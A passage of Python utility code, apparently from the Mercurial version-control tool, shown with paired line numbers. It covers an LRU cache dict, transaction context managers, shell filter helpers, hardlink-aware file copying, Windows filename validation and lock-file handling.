1195 1236 >>> b is c
1196 1237 False
1197 1238 >>> b is b.preparewrite()
1198 1239 True
1199 1240 """
1200 1241
1201 1242 class cowsortdict(cow, sortdict):
1202 1243 """copy-on-write sortdict
1203 1244
1204 1245 Be sure to call d = d.preparewrite() before writing to d.
1205 1246 """
1206 1247
1207 1248 class transactional(object):
1208 1249 """Base class for making a transactional type into a context manager."""
1209 1250 __metaclass__ = abc.ABCMeta
1210 1251
1211 1252 @abc.abstractmethod
1212 1253 def close(self):
1213 1254 """Successfully closes the transaction."""
1214 1255
1215 1256 @abc.abstractmethod
1216 1257 def release(self):
1217 1258 """Marks the end of the transaction.
1218 1259
1219 1260 If the transaction has not been closed, it will be aborted.
1220 1261 """
1221 1262
1222 1263 def __enter__(self):
1223 1264 return self
1224 1265
1225 1266 def __exit__(self, exc_type, exc_val, exc_tb):
1226 1267 try:
1227 1268 if exc_type is None:
1228 1269 self.close()
1229 1270 finally:
1230 1271 self.release()
1231 1272
1232 1273 @contextlib.contextmanager
1233 1274 def acceptintervention(tr=None):
1234 1275 """A context manager that closes the transaction on InterventionRequired
1235 1276
1236 1277 If no transaction was provided, this simply runs the body and returns
1237 1278 """
1238 1279 if not tr:
1239 1280 yield
1240 1281 return
1241 1282 try:
1242 1283 yield
1243 1284 tr.close()
1244 1285 except error.InterventionRequired:
1245 1286 tr.close()
1246 1287 raise
1247 1288 finally:
1248 1289 tr.release()
1249 1290
1250 1291 @contextlib.contextmanager
1251 1292 def nullcontextmanager():
1252 1293 yield
1253 1294
1254 1295 class _lrucachenode(object):
1255 1296 """A node in a doubly linked list.
1256 1297
1257 1298 Holds a reference to nodes on either side as well as a key-value
1258 1299 pair for the dictionary entry.
1259 1300 """
1260 1301 __slots__ = (u'next', u'prev', u'key', u'value')
1261 1302
1262 1303 def __init__(self):
1263 1304 self.next = None
1264 1305 self.prev = None
1265 1306
1266 1307 self.key = _notset
1267 1308 self.value = None
1268 1309
1269 1310 def markempty(self):
1270 1311 """Mark the node as emptied."""
1271 1312 self.key = _notset
1272 1313
1273 1314 class lrucachedict(object):
1274 1315 """Dict that caches most recent accesses and sets.
1275 1316
1276 1317 The dict consists of an actual backing dict - indexed by original
1277 1318 key - and a doubly linked circular list defining the order of entries in
1278 1319 the cache.
1279 1320
1280 1321 The head node is the newest entry in the cache. If the cache is full,
1281 1322 we recycle head.prev and make it the new head. Cache accesses result in
1282 1323 the node being moved to before the existing head and being marked as the
1283 1324 new head node.
1284 1325 """
1285 1326 def __init__(self, max):
1286 1327 self._cache = {}
1287 1328
1288 1329 self._head = head = _lrucachenode()
1289 1330 head.prev = head
1290 1331 head.next = head
1291 1332 self._size = 1
1292 1333 self._capacity = max
1293 1334
1294 1335 def __len__(self):
1295 1336 return len(self._cache)
1296 1337
1297 1338 def __contains__(self, k):
1298 1339 return k in self._cache
1299 1340
1300 1341 def __iter__(self):
1301 1342 # We don't have to iterate in cache order, but why not.
1302 1343 n = self._head
1303 1344 for i in range(len(self._cache)):
1304 1345 yield n.key
1305 1346 n = n.next
1306 1347
1307 1348 def __getitem__(self, k):
1308 1349 node = self._cache[k]
1309 1350 self._movetohead(node)
1310 1351 return node.value
1311 1352
1312 1353 def __setitem__(self, k, v):
1313 1354 node = self._cache.get(k)
1314 1355 # Replace existing value and mark as newest.
1315 1356 if node is not None:
1316 1357 node.value = v
1317 1358 self._movetohead(node)
1318 1359 return
1319 1360
1320 1361 if self._size < self._capacity:
1321 1362 node = self._addcapacity()
1322 1363 else:
1323 1364 # Grab the last/oldest item.
1324 1365 node = self._head.prev
1325 1366
1326 1367 # At capacity. Kill the old entry.
1327 1368 if node.key is not _notset:
1328 1369 del self._cache[node.key]
1329 1370
1330 1371 node.key = k
1331 1372 node.value = v
1332 1373 self._cache[k] = node
1333 1374 # And mark it as newest entry. No need to adjust order since it
1334 1375 # is already self._head.prev.
1335 1376 self._head = node
1336 1377
1337 1378 def __delitem__(self, k):
1338 1379 node = self._cache.pop(k)
1339 1380 node.markempty()
1340 1381
1341 1382 # Temporarily mark as newest item before re-adjusting head to make
1342 1383 # this node the oldest item.
1343 1384 self._movetohead(node)
1344 1385 self._head = node.next
1345 1386
1346 1387 # Additional dict methods.
1347 1388
1348 1389 def get(self, k, default=None):
1349 1390 try:
1350 1391 return self._cache[k].value
1351 1392 except KeyError:
1352 1393 return default
1353 1394
1354 1395 def clear(self):
1355 1396 n = self._head
1356 1397 while n.key is not _notset:
1357 1398 n.markempty()
1358 1399 n = n.next
1359 1400
1360 1401 self._cache.clear()
1361 1402
1362 1403 def copy(self):
1363 1404 result = lrucachedict(self._capacity)
1364 1405 n = self._head.prev
1365 1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1366 1407 for i in range(len(self._cache)):
1367 1408 result[n.key] = n.value
1368 1409 n = n.prev
1369 1410 return result
1370 1411
1371 1412 def _movetohead(self, node):
1372 1413 """Mark a node as the newest, making it the new head.
1373 1414
1374 1415 When a node is accessed, it becomes the freshest entry in the LRU
1375 1416 list, which is denoted by self._head.
1376 1417
1377 1418 Visually, let's make ``N`` the new head node (* denotes head):
1378 1419
1379 1420 previous/oldest <-> head <-> next/next newest
1380 1421
1381 1422 ----<->--- A* ---<->-----
1382 1423 | |
1383 1424 E <-> D <-> N <-> C <-> B
1384 1425
1385 1426 To:
1386 1427
1387 1428 ----<->--- N* ---<->-----
1388 1429 | |
1389 1430 E <-> D <-> C <-> B <-> A
1390 1431
1391 1432 This requires the following moves:
1392 1433
1393 1434 C.next = D (node.prev.next = node.next)
1394 1435 D.prev = C (node.next.prev = node.prev)
1395 1436 E.next = N (head.prev.next = node)
1396 1437 N.prev = E (node.prev = head.prev)
1397 1438 N.next = A (node.next = head)
1398 1439 A.prev = N (head.prev = node)
1399 1440 """
1400 1441 head = self._head
1401 1442 # C.next = D
1402 1443 node.prev.next = node.next
1403 1444 # D.prev = C
1404 1445 node.next.prev = node.prev
1405 1446 # N.prev = E
1406 1447 node.prev = head.prev
1407 1448 # N.next = A
1408 1449 # It is tempting to do just "head" here, however if node is
1409 1450 # adjacent to head, this will do bad things.
1410 1451 node.next = head.prev.next
1411 1452 # E.next = N
1412 1453 node.next.prev = node
1413 1454 # A.prev = N
1414 1455 node.prev.next = node
1415 1456
1416 1457 self._head = node
1417 1458
1418 1459 def _addcapacity(self):
1419 1460 """Add a node to the circular linked list.
1420 1461
1421 1462 The new node is inserted before the head node.
1422 1463 """
1423 1464 head = self._head
1424 1465 node = _lrucachenode()
1425 1466 head.prev.next = node
1426 1467 node.prev = head.prev
1427 1468 node.next = head
1428 1469 head.prev = node
1429 1470 self._size += 1
1430 1471 return node
1431 1472
1432 1473 def lrucachefunc(func):
1433 1474 '''cache most recent results of function calls'''
1434 1475 cache = {}
1435 1476 order = collections.deque()
1436 1477 if func.__code__.co_argcount == 1:
1437 1478 def f(arg):
1438 1479 if arg not in cache:
1439 1480 if len(cache) > 20:
1440 1481 del cache[order.popleft()]
1441 1482 cache[arg] = func(arg)
1442 1483 else:
1443 1484 order.remove(arg)
1444 1485 order.append(arg)
1445 1486 return cache[arg]
1446 1487 else:
1447 1488 def f(*args):
1448 1489 if args not in cache:
1449 1490 if len(cache) > 20:
1450 1491 del cache[order.popleft()]
1451 1492 cache[args] = func(*args)
1452 1493 else:
1453 1494 order.remove(args)
1454 1495 order.append(args)
1455 1496 return cache[args]
1456 1497
1457 1498 return f
1458 1499
1459 1500 class propertycache(object):
1460 1501 def __init__(self, func):
1461 1502 self.func = func
1462 1503 self.name = func.__name__
1463 1504 def __get__(self, obj, type=None):
1464 1505 result = self.func(obj)
1465 1506 self.cachevalue(obj, result)
1466 1507 return result
1467 1508
1468 1509 def cachevalue(self, obj, value):
1469 1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1470 1511 obj.__dict__[self.name] = value
1471 1512
1472 1513 def clearcachedproperty(obj, prop):
1473 1514 '''clear a cached property value, if one has been set'''
1474 1515 if prop in obj.__dict__:
1475 1516 del obj.__dict__[prop]
1476 1517
1477 1518 def pipefilter(s, cmd):
1478 1519 '''filter string S through command CMD, returning its output'''
1479 1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1480 1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1481 1522 pout, perr = p.communicate(s)
1482 1523 return pout
1483 1524
1484 1525 def tempfilter(s, cmd):
1485 1526 '''filter string S through a pair of temporary files with CMD.
1486 1527 CMD is used as a template to create the real command to be run,
1487 1528 with the strings INFILE and OUTFILE replaced by the real names of
1488 1529 the temporary files generated.'''
1489 1530 inname, outname = None, None
1490 1531 try:
1491 1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1492 1533 fp = os.fdopen(infd, r'wb')
1493 1534 fp.write(s)
1494 1535 fp.close()
1495 1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1496 1537 os.close(outfd)
1497 1538 cmd = cmd.replace('INFILE', inname)
1498 1539 cmd = cmd.replace('OUTFILE', outname)
1499 1540 code = os.system(cmd)
1500 1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1501 1542 code = 0
1502 1543 if code:
1503 1544 raise Abort(_("command '%s' failed: %s") %
1504 1545 (cmd, explainexit(code)))
1505 1546 return readfile(outname)
1506 1547 finally:
1507 1548 try:
1508 1549 if inname:
1509 1550 os.unlink(inname)
1510 1551 except OSError:
1511 1552 pass
1512 1553 try:
1513 1554 if outname:
1514 1555 os.unlink(outname)
1515 1556 except OSError:
1516 1557 pass
1517 1558
1518 1559 filtertable = {
1519 1560 'tempfile:': tempfilter,
1520 1561 'pipe:': pipefilter,
1521 1562 }
1522 1563
1523 1564 def filter(s, cmd):
1524 1565 "filter a string through a command that transforms its input to its output"
1525 1566 for name, fn in filtertable.iteritems():
1526 1567 if cmd.startswith(name):
1527 1568 return fn(s, cmd[len(name):].lstrip())
1528 1569 return pipefilter(s, cmd)
1529 1570
1530 1571 def binary(s):
1531 1572 """return true if a string is binary data"""
1532 1573 return bool(s and '\0' in s)
1533 1574
1534 1575 def increasingchunks(source, min=1024, max=65536):
1535 1576 '''return no less than min bytes per chunk while data remains,
1536 1577 doubling min after each chunk until it reaches max'''
1537 1578 def log2(x):
1538 1579 if not x:
1539 1580 return 0
1540 1581 i = 0
1541 1582 while x:
1542 1583 x >>= 1
1543 1584 i += 1
1544 1585 return i - 1
1545 1586
1546 1587 buf = []
1547 1588 blen = 0
1548 1589 for chunk in source:
1549 1590 buf.append(chunk)
1550 1591 blen += len(chunk)
1551 1592 if blen >= min:
1552 1593 if min < max:
1553 1594 min = min << 1
1554 1595 nmin = 1 << log2(blen)
1555 1596 if nmin > min:
1556 1597 min = nmin
1557 1598 if min > max:
1558 1599 min = max
1559 1600 yield ''.join(buf)
1560 1601 blen = 0
1561 1602 buf = []
1562 1603 if buf:
1563 1604 yield ''.join(buf)
1564 1605
1565 1606 Abort = error.Abort
1566 1607
1567 1608 def always(fn):
1568 1609 return True
1569 1610
1570 1611 def never(fn):
1571 1612 return False
1572 1613
1573 1614 def nogc(func):
1574 1615 """disable garbage collector
1575 1616
1576 1617 Python's garbage collector triggers a GC each time a certain number of
1577 1618 container objects (the number being defined by gc.get_threshold()) are
1578 1619 allocated even when marked not to be tracked by the collector. Tracking has
1579 1620 no effect on when GCs are triggered, only on what objects the GC looks
1580 1621 into. As a workaround, disable GC while building complex (huge)
1581 1622 containers.
1582 1623
1583 1624 This garbage collector issue have been fixed in 2.7. But it still affect
1584 1625 CPython's performance.
1585 1626 """
1586 1627 def wrapper(*args, **kwargs):
1587 1628 gcenabled = gc.isenabled()
1588 1629 gc.disable()
1589 1630 try:
1590 1631 return func(*args, **kwargs)
1591 1632 finally:
1592 1633 if gcenabled:
1593 1634 gc.enable()
1594 1635 return wrapper
1595 1636
1596 1637 if pycompat.ispypy:
1597 1638 # PyPy runs slower with gc disabled
1598 1639 nogc = lambda x: x
1599 1640
1600 1641 def pathto(root, n1, n2):
1601 1642 '''return the relative path from one place to another.
1602 1643 root should use os.sep to separate directories
1603 1644 n1 should use os.sep to separate directories
1604 1645 n2 should use "/" to separate directories
1605 1646 returns an os.sep-separated path.
1606 1647
1607 1648 If n1 is a relative path, it's assumed it's
1608 1649 relative to root.
1609 1650 n2 should always be relative to root.
1610 1651 '''
1611 1652 if not n1:
1612 1653 return localpath(n2)
1613 1654 if os.path.isabs(n1):
1614 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1615 1656 return os.path.join(root, localpath(n2))
1616 1657 n2 = '/'.join((pconvert(root), n2))
1617 1658 a, b = splitpath(n1), n2.split('/')
1618 1659 a.reverse()
1619 1660 b.reverse()
1620 1661 while a and b and a[-1] == b[-1]:
1621 1662 a.pop()
1622 1663 b.pop()
1623 1664 b.reverse()
1624 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1625 1666
1626 1667 def mainfrozen():
1627 1668 """return True if we are a frozen executable.
1628 1669
1629 1670 The code supports py2exe (most common, Windows only) and tools/freeze
1630 1671 (portable, not much used).
1631 1672 """
1632 1673 return (safehasattr(sys, "frozen") or # new py2exe
1633 1674 safehasattr(sys, "importers") or # old py2exe
1634 1675 imp.is_frozen(u"__main__")) # tools/freeze
1635 1676
1636 1677 # the location of data files matching the source code
1637 1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1638 1679 # executable version (py2exe) doesn't support __file__
1639 1680 datapath = os.path.dirname(pycompat.sysexecutable)
1640 1681 else:
1641 1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1642 1683
1643 1684 i18n.setdatapath(datapath)
1644 1685
1645 1686 _hgexecutable = None
1646 1687
1647 1688 def hgexecutable():
1648 1689 """return location of the 'hg' executable.
1649 1690
1650 1691 Defaults to $HG or 'hg' in the search path.
1651 1692 """
1652 1693 if _hgexecutable is None:
1653 1694 hg = encoding.environ.get('HG')
1654 1695 mainmod = sys.modules[r'__main__']
1655 1696 if hg:
1656 1697 _sethgexecutable(hg)
1657 1698 elif mainfrozen():
1658 1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1659 1700 # Env variable set by py2app
1660 1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1661 1702 else:
1662 1703 _sethgexecutable(pycompat.sysexecutable)
1663 1704 elif (os.path.basename(
1664 1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1665 1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1666 1707 else:
1667 1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1668 1709 _sethgexecutable(exe)
1669 1710 return _hgexecutable
1670 1711
1671 1712 def _sethgexecutable(path):
1672 1713 """set location of the 'hg' executable"""
1673 1714 global _hgexecutable
1674 1715 _hgexecutable = path
1675 1716
1676 1717 def _testfileno(f, stdf):
1677 1718 fileno = getattr(f, 'fileno', None)
1678 1719 try:
1679 1720 return fileno and fileno() == stdf.fileno()
1680 1721 except io.UnsupportedOperation:
1681 1722 return False # fileno() raised UnsupportedOperation
1682 1723
1683 1724 def isstdin(f):
1684 1725 return _testfileno(f, sys.__stdin__)
1685 1726
1686 1727 def isstdout(f):
1687 1728 return _testfileno(f, sys.__stdout__)
1688 1729
1689 1730 def shellenviron(environ=None):
1690 1731 """return environ with optional override, useful for shelling out"""
1691 1732 def py2shell(val):
1692 1733 'convert python object into string that is useful to shell'
1693 1734 if val is None or val is False:
1694 1735 return '0'
1695 1736 if val is True:
1696 1737 return '1'
1697 1738 return pycompat.bytestr(val)
1698 1739 env = dict(encoding.environ)
1699 1740 if environ:
1700 1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1701 1742 env['HG'] = hgexecutable()
1702 1743 return env
1703 1744
1704 1745 def system(cmd, environ=None, cwd=None, out=None):
1705 1746 '''enhanced shell command execution.
1706 1747 run with environment maybe modified, maybe in different dir.
1707 1748
1708 1749 if out is specified, it is assumed to be a file-like object that has a
1709 1750 write() method. stdout and stderr will be redirected to out.'''
1710 1751 try:
1711 1752 stdout.flush()
1712 1753 except Exception:
1713 1754 pass
1714 1755 cmd = quotecommand(cmd)
1715 1756 env = shellenviron(environ)
1716 1757 if out is None or isstdout(out):
1717 1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1718 1759 env=env, cwd=cwd)
1719 1760 else:
1720 1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1721 1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1722 1763 stderr=subprocess.STDOUT)
1723 1764 for line in iter(proc.stdout.readline, ''):
1724 1765 out.write(line)
1725 1766 proc.wait()
1726 1767 rc = proc.returncode
1727 1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1728 1769 rc = 0
1729 1770 return rc
1730 1771
1731 1772 def checksignature(func):
1732 1773 '''wrap a function with code to check for calling errors'''
1733 1774 def check(*args, **kwargs):
1734 1775 try:
1735 1776 return func(*args, **kwargs)
1736 1777 except TypeError:
1737 1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1738 1779 raise error.SignatureError
1739 1780 raise
1740 1781
1741 1782 return check
1742 1783
1743 1784 # a whilelist of known filesystems where hardlink works reliably
1744 1785 _hardlinkfswhitelist = {
1745 1786 'btrfs',
1746 1787 'ext2',
1747 1788 'ext3',
1748 1789 'ext4',
1749 1790 'hfs',
1750 1791 'jfs',
1751 1792 'NTFS',
1752 1793 'reiserfs',
1753 1794 'tmpfs',
1754 1795 'ufs',
1755 1796 'xfs',
1756 1797 'zfs',
1757 1798 }
1758 1799
1759 1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1760 1801 '''copy a file, preserving mode and optionally other stat info like
1761 1802 atime/mtime
1762 1803
1763 1804 checkambig argument is used with filestat, and is useful only if
1764 1805 destination file is guarded by any lock (e.g. repo.lock or
1765 1806 repo.wlock).
1766 1807
1767 1808 copystat and checkambig should be exclusive.
1768 1809 '''
1769 1810 assert not (copystat and checkambig)
1770 1811 oldstat = None
1771 1812 if os.path.lexists(dest):
1772 1813 if checkambig:
1773 1814 oldstat = checkambig and filestat.frompath(dest)
1774 1815 unlink(dest)
1775 1816 if hardlink:
1776 1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1777 1818 # unless we are confident that dest is on a whitelisted filesystem.
1778 1819 try:
1779 1820 fstype = getfstype(os.path.dirname(dest))
1780 1821 except OSError:
1781 1822 fstype = None
1782 1823 if fstype not in _hardlinkfswhitelist:
1783 1824 hardlink = False
1784 1825 if hardlink:
1785 1826 try:
1786 1827 oslink(src, dest)
1787 1828 return
1788 1829 except (IOError, OSError):
1789 1830 pass # fall back to normal copy
1790 1831 if os.path.islink(src):
1791 1832 os.symlink(os.readlink(src), dest)
1792 1833 # copytime is ignored for symlinks, but in general copytime isn't needed
1793 1834 # for them anyway
1794 1835 else:
1795 1836 try:
1796 1837 shutil.copyfile(src, dest)
1797 1838 if copystat:
1798 1839 # copystat also copies mode
1799 1840 shutil.copystat(src, dest)
1800 1841 else:
1801 1842 shutil.copymode(src, dest)
1802 1843 if oldstat and oldstat.stat:
1803 1844 newstat = filestat.frompath(dest)
1804 1845 if newstat.isambig(oldstat):
1805 1846 # stat of copied file is ambiguous to original one
1806 1847 advanced = (
1807 1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1808 1849 os.utime(dest, (advanced, advanced))
1809 1850 except shutil.Error as inst:
1810 1851 raise Abort(str(inst))
1811 1852
1812 1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1813 1854 """Copy a directory tree using hardlinks if possible."""
1814 1855 num = 0
1815 1856
1816 1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1817 1858
1818 1859 if os.path.isdir(src):
1819 1860 if hardlink is None:
1820 1861 hardlink = (os.stat(src).st_dev ==
1821 1862 os.stat(os.path.dirname(dst)).st_dev)
1822 1863 topic = gettopic()
1823 1864 os.mkdir(dst)
1824 1865 for name, kind in listdir(src):
1825 1866 srcname = os.path.join(src, name)
1826 1867 dstname = os.path.join(dst, name)
1827 1868 def nprog(t, pos):
1828 1869 if pos is not None:
1829 1870 return progress(t, pos + num)
1830 1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1831 1872 num += n
1832 1873 else:
1833 1874 if hardlink is None:
1834 1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1835 1876 os.stat(os.path.dirname(dst)).st_dev)
1836 1877 topic = gettopic()
1837 1878
1838 1879 if hardlink:
1839 1880 try:
1840 1881 oslink(src, dst)
1841 1882 except (IOError, OSError):
1842 1883 hardlink = False
1843 1884 shutil.copy(src, dst)
1844 1885 else:
1845 1886 shutil.copy(src, dst)
1846 1887 num += 1
1847 1888 progress(topic, num)
1848 1889 progress(topic, None)
1849 1890
1850 1891 return hardlink, num
1851 1892
1852 1893 _winreservednames = {
1853 1894 'con', 'prn', 'aux', 'nul',
1854 1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1855 1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1856 1897 }
1857 1898 _winreservedchars = ':*?"<>|'
1858 1899 def checkwinfilename(path):
1859 1900 r'''Check that the base-relative path is a valid filename on Windows.
1860 1901 Returns None if the path is ok, or a UI string describing the problem.
1861 1902
1862 1903 >>> checkwinfilename(b"just/a/normal/path")
1863 1904 >>> checkwinfilename(b"foo/bar/con.xml")
1864 1905 "filename contains 'con', which is reserved on Windows"
1865 1906 >>> checkwinfilename(b"foo/con.xml/bar")
1866 1907 "filename contains 'con', which is reserved on Windows"
1867 1908 >>> checkwinfilename(b"foo/bar/xml.con")
1868 1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1869 1910 "filename contains 'AUX', which is reserved on Windows"
1870 1911 >>> checkwinfilename(b"foo/bar/bla:.txt")
1871 1912 "filename contains ':', which is reserved on Windows"
1872 1913 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1873 1914 "filename contains '\\x07', which is invalid on Windows"
1874 1915 >>> checkwinfilename(b"foo/bar/bla ")
1875 1916 "filename ends with ' ', which is not allowed on Windows"
1876 1917 >>> checkwinfilename(b"../bar")
1877 1918 >>> checkwinfilename(b"foo\\")
1878 1919 "filename ends with '\\', which is invalid on Windows"
1879 1920 >>> checkwinfilename(b"foo\\/bar")
1880 1921 "directory name ends with '\\', which is invalid on Windows"
1881 1922 '''
1882 1923 if path.endswith('\\'):
1883 1924 return _("filename ends with '\\', which is invalid on Windows")
1884 1925 if '\\/' in path:
1885 1926 return _("directory name ends with '\\', which is invalid on Windows")
1886 1927 for n in path.replace('\\', '/').split('/'):
1887 1928 if not n:
1888 1929 continue
1889 1930 for c in _filenamebytestr(n):
1890 1931 if c in _winreservedchars:
1891 1932 return _("filename contains '%s', which is reserved "
1892 1933 "on Windows") % c
1893 1934 if ord(c) <= 31:
1894 1935 return _("filename contains '%s', which is invalid "
1895 1936 "on Windows") % escapestr(c)
1896 1937 base = n.split('.')[0]
1897 1938 if base and base.lower() in _winreservednames:
1898 1939 return _("filename contains '%s', which is reserved "
1899 1940 "on Windows") % base
1900 1941 t = n[-1:]
1901 1942 if t in '. ' and n not in '..':
1902 1943 return _("filename ends with '%s', which is not allowed "
1903 1944 "on Windows") % t
1904 1945
1905 1946 if pycompat.iswindows:
1906 1947 checkosfilename = checkwinfilename
1907 1948 timer = time.clock
1908 1949 else:
1909 1950 checkosfilename = platform.checkosfilename
1910 1951 timer = time.time
1911 1952
1912 1953 if safehasattr(time, "perf_counter"):
1913 1954 timer = time.perf_counter
1914 1955
1915 1956 def makelock(info, pathname):
1916 1957 """Create a lock file atomically if possible
1917 1958
1918 1959 This may leave a stale lock file if symlink isn't supported and signal
1919 1960 interrupt is enabled.
1920 1961 """
1921 1962 try:
1922 1963 return os.symlink(info, pathname)
1923 1964 except OSError as why:
1924 1965 if why.errno == errno.EEXIST:
1925 1966 raise
1926 1967 except AttributeError: # no symlink in os
1927 1968 pass
1928 1969
1929 1970 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1930 1971 ld = os.open(pathname, flags)
1931 1972 os.write(ld, info)
1932 1973 os.close(ld)
1933 1974
1934 1975 def readlock(pathname):
1935 1976 try:
1936 1977 return os.readlink(pathname)
1937 1978 except OSError as why:
1938 1979 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1939 1980 raise
1940 1981 except AttributeError: # no symlink in os
1941 1982 pass
1942 1983 fp = posixfile(pathname, 'rb')
1943 1984 r = fp.read()
1944 1985 fp.close()
1945 1986 return r
1946 1987
1947 1988 def fstat(fp):
1948 1989 '''stat file object that may not have fileno method.'''
1949 1990 try:
1950 1991 return os.fstat(fp.fileno())
1951 1992 except AttributeError:
1952 1993 return os.stat(fp.name)
1953 1994
1954 1995 # File system features
1955 1996
1956 1997 def fscasesensitive(path):
1957 1998 """
1958 1999 Return true if the given path is on a case-sensitive filesystem
1959 2000
1960 2001 Requires a path (like /foo/.hg) ending with a foldable final
1961 2002 directory component.
1962 2003 """
1963 2004 s1 = os.lstat(path)
1964 2005 d, b = os.path.split(path)
1965 2006 b2 = b.upper()
1966 2007 if b == b2:
1967 2008 b2 = b.lower()
1968 2009 if b == b2:
1969 2010 return True # no evidence against case sensitivity
1970 2011 p2 = os.path.join(d, b2)
1971 2012 try:
1972 2013 s2 = os.lstat(p2)
1973 2014 if s2 == s1:
1974 2015 return False
1975 2016 return True
1976 2017 except OSError:
1977 2018 return True
1978 2019
1979 2020 try:
1980 2021 import re2
1981 2022 _re2 = None
1982 2023 except ImportError:
1983 2024 _re2 = False
1984 2025
1985 2026 class _re(object):
1986 2027 def _checkre2(self):
1987 2028 global _re2
1988 2029 try:
1989 2030 # check if match works, see issue3964
1990 2031 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1991 2032 except ImportError:
1992 2033 _re2 = False
1993 2034
1994 2035 def compile(self, pat, flags=0):
1995 2036 '''Compile a regular expression, using re2 if possible
1996 2037
1997 2038 For best performance, use only re2-compatible regexp features. The
1998 2039 only flags from the re module that are re2-compatible are
1999 2040 IGNORECASE and MULTILINE.'''
2000 2041 if _re2 is None:
2001 2042 self._checkre2()
2002 2043 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2003 2044 if flags & remod.IGNORECASE:
2004 2045 pat = '(?i)' + pat
2005 2046 if flags & remod.MULTILINE:
2006 2047 pat = '(?m)' + pat
2007 2048 try:
2008 2049 return re2.compile(pat)
2009 2050 except re2.error:
2010 2051 pass
2011 2052 return remod.compile(pat, flags)
2012 2053
2013 2054 @propertycache
2014 2055 def escape(self):
2015 2056 '''Return the version of escape corresponding to self.compile.
2016 2057
2017 2058 This is imperfect because whether re2 or re is used for a particular
2018 2059 function depends on the flags, etc, but it's the best we can do.
2019 2060 '''
2020 2061 global _re2
2021 2062 if _re2 is None:
2022 2063 self._checkre2()
2023 2064 if _re2:
2024 2065 return re2.escape
2025 2066 else:
2026 2067 return remod.escape
2027 2068
2028 2069 re = _re()
2029 2070
2030 2071 _fspathcache = {}
2031 2072 def fspath(name, root):
2032 2073 '''Get name in the case stored in the filesystem
2033 2074
2034 2075 The name should be relative to root, and be normcase-ed for efficiency.
2035 2076
2036 2077 Note that this function is unnecessary, and should not be
2037 2078 called, for case-sensitive filesystems (simply because it's expensive).
2038 2079
2039 2080 The root should be normcase-ed, too.
2040 2081 '''
2041 2082 def _makefspathcacheentry(dir):
2042 2083 return dict((normcase(n), n) for n in os.listdir(dir))
2043 2084
2044 2085 seps = pycompat.ossep
2045 2086 if pycompat.osaltsep:
2046 2087 seps = seps + pycompat.osaltsep
2047 2088 # Protect backslashes. This gets silly very quickly.
2048 2089 seps.replace('\\','\\\\')
2049 2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2050 2091 dir = os.path.normpath(root)
2051 2092 result = []
2052 2093 for part, sep in pattern.findall(name):
2053 2094 if sep:
2054 2095 result.append(sep)
2055 2096 continue
2056 2097
2057 2098 if dir not in _fspathcache:
2058 2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2059 2100 contents = _fspathcache[dir]
2060 2101
2061 2102 found = contents.get(part)
2062 2103 if not found:
2063 2104 # retry "once per directory" per "dirstate.walk" which
2064 2105 # may take place for each patches of "hg qpush", for example
2065 2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2066 2107 found = contents.get(part)
2067 2108
2068 2109 result.append(found or part)
2069 2110 dir = os.path.join(dir, part)
2070 2111
2071 2112 return ''.join(result)
2072 2113
2073 2114 def checknlink(testfile):
2074 2115 '''check whether hardlink count reporting works properly'''
2075 2116
2076 2117 # testfile may be open, so we need a separate file for checking to
2077 2118 # work around issue2543 (or testfile may get lost on Samba shares)
2078 2119 f1, f2, fp = None, None, None
2079 2120 try:
2080 2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2081 2122 suffix='1~', dir=os.path.dirname(testfile))
2082 2123 os.close(fd)
2083 2124 f2 = '%s2~' % f1[:-2]
2084 2125
2085 2126 oslink(f1, f2)
2086 2127 # nlinks() may behave differently for files on Windows shares if
2087 2128 # the file is open.
2088 2129 fp = posixfile(f2)
2089 2130 return nlinks(f2) > 1
2090 2131 except OSError:
2091 2132 return False
2092 2133 finally:
2093 2134 if fp is not None:
2094 2135 fp.close()
2095 2136 for f in (f1, f2):
2096 2137 try:
2097 2138 if f is not None:
2098 2139 os.unlink(f)
2099 2140 except OSError:
2100 2141 pass
2101 2142
2102 2143 def endswithsep(path):
2103 2144 '''Check path ends with os.sep or os.altsep.'''
